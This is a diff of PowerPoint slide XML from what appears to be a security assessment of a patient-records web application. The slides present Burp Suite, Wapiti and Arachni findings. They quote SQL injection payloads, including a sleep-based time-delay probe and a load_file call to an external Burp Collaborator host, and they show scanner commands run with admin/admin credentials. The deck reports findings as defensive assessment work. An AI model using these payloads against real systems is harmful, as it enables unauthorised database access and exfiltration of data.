+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Error Message: 98963262' or 8004=8004—</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="571500" lvl="1" indent="-342900">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="alphaLcParenR"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-CA" b="1" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="404040"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-CA" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" b="1" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>ocms</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>/hooks/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" b="1" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>patient_diagnosis.php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t> [Method : POST]</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="571500" lvl="1" indent="-342900">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="alphaLcParenR"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Code Injection: '+(select </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>load_file</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>('\\\\c0df40ldznkv8kfgxp3j0k0spjvcj4as1vpncd02.burpcollaborator.net\\</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>jby</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>'))+’ interacted with an external domain [</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>DNS lookup of type A -IP address 24.201.141.186]</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="404040"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="571500" lvl="1" indent="-342900">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="alphaLcParenR"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Error Message: 22601788' or 2388=2388--</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="404040"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="404040"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-CA" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5435089"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide8.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9C498C9-7E82-4EE2-9B52-16F4658AE984}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="2013022" y="335518"/>
+            <a:ext cx="7729728" cy="1188720"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>Burp suite Report Analysis (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>Cont</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C98840CC-FB2A-4798-84FA-FE3966B8ABA9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="369115" y="1862357"/>
+            <a:ext cx="8887073" cy="4020284"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="342900" indent="-342900">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="arabicPeriod"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-CA" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" b="1" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>ocms</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>/hooks/</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" b="1" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>patient_history.php</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" b="1" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>  [Method: POST]</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="571500" lvl="1" indent="-342900">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="alphaLcParenR"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Error Message: payload 95747182' or 7702=7702—</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="571500" lvl="1" indent="-342900">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="alphaLcParenR"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Time Delay: payload </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>'+(select*from(select(sleep(20)))a)+’ caused 20705ms response to the request. </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr marL="571500" lvl="1" indent="-342900">
+              <a:buFont typeface="+mj-lt"/>
+              <a:buAutoNum type="alphaLcParenR"/>
+            </a:pPr>
+            <a:endParaRPr lang="en-CA" dirty="0">
+              <a:solidFill>
+                <a:srgbClr val="404040"/>
+              </a:solidFill>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:pPr marL="0" indent="0">
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-GB" b="1" u="sng" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Vulnerability classifications:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>    CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>    CWE-94: Improper Control of Generation of Code ('Code Injection')</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="404040"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>    CWE-116: Improper Encoding or Escaping of Output</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2595120840"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
 <file path=ppt/slides/slide9.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
@@ -5661,8 +6144,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="2231135" y="143598"/>
-            <a:ext cx="7729728" cy="640173"/>
+            <a:off x="2231136" y="123118"/>
+            <a:ext cx="7729728" cy="641992"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
@@ -5672,19 +6155,22 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-CA"/>
-              <a:t>Wapiti report</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="Content Placeholder 3">
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>Arachni</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t> report</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E4F219B-F14B-4E42-8E67-2D428C9998F5}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B982AA0-010D-4BCE-A2EB-63252EF5FE5D}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5697,8 +6183,8 @@
         </p:nvSpPr>
         <p:spPr>
           <a:xfrm>
-            <a:off x="196637" y="1695226"/>
-            <a:ext cx="4366032" cy="4732670"/>
+            <a:off x="246266" y="949203"/>
+            <a:ext cx="11699468" cy="5507580"/>
           </a:xfrm>
         </p:spPr>
         <p:txBody>
@@ -5706,48 +6192,21 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-CA" sz="2400" dirty="0" err="1"/>
-              <a:t>sudo</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
-              <a:t> wapiti -u http://192.168.0.61/ocms/ --scope punk -m </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" sz="2400" dirty="0" err="1"/>
-              <a:t>sql,xss,shellshock,blindsql,nikto</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
-              <a:t> -l 2 --auth-type basic -a </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" sz="2400" dirty="0" err="1"/>
-              <a:t>admin%admin</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
-              <a:t> -d 10 -f html -o /home/kali/</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-CA" sz="2400" dirty="0" err="1"/>
-              <a:t>wapiti_result_new</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-CA" sz="2400" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-CA" sz="2400" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-CA" sz="2400" dirty="0"/>
-              <a:t>Apache Server Sided Issues only.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:endParaRPr lang="en-CA" dirty="0"/>
-          </a:p>
-          <a:p>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t>CLI command : </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>arachni</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0"/>
+              <a:t> http://www.arafat.com/ocms --http-authentication-type basic --http-authentication-username admin --http-authentication-password admin --report-save-path=</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-CA" dirty="0" err="1"/>
+              <a:t>arafat.com.afr</a:t>
+            </a:r>
             <a:endParaRPr lang="en-CA" dirty="0"/>
           </a:p>
           <a:p>
@@ -5757,10 +6216,10 @@
       </p:sp>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a social media post&#10;&#10;Description automatically generated">
+          <p:cNvPr id="4" name="Picture 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01039D84-66DB-4494-8B73-9750797DB711}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00C2161B-7D05-43EA-BF1F-F83B377F8B75}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -5770,21 +6229,15 @@
           <p:nvPr/>
         </p:nvPicPr>
         <p:blipFill>
-          <a:blip r:embed="rId2">
-            <a:extLst>
-              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
-                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
-              </a:ext>
-            </a:extLst>
-          </a:blip>
+          <a:blip r:embed="rId2"/>
           <a:stretch>
             <a:fillRect/>
           </a:stretch>
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="4744696" y="1601920"/>
-            <a:ext cx="7102089" cy="4209807"/>
+            <a:off x="1525547" y="1747856"/>
+            <a:ext cx="9682081" cy="4817115"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -5794,7 +6247,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1829199038"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="655257166"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
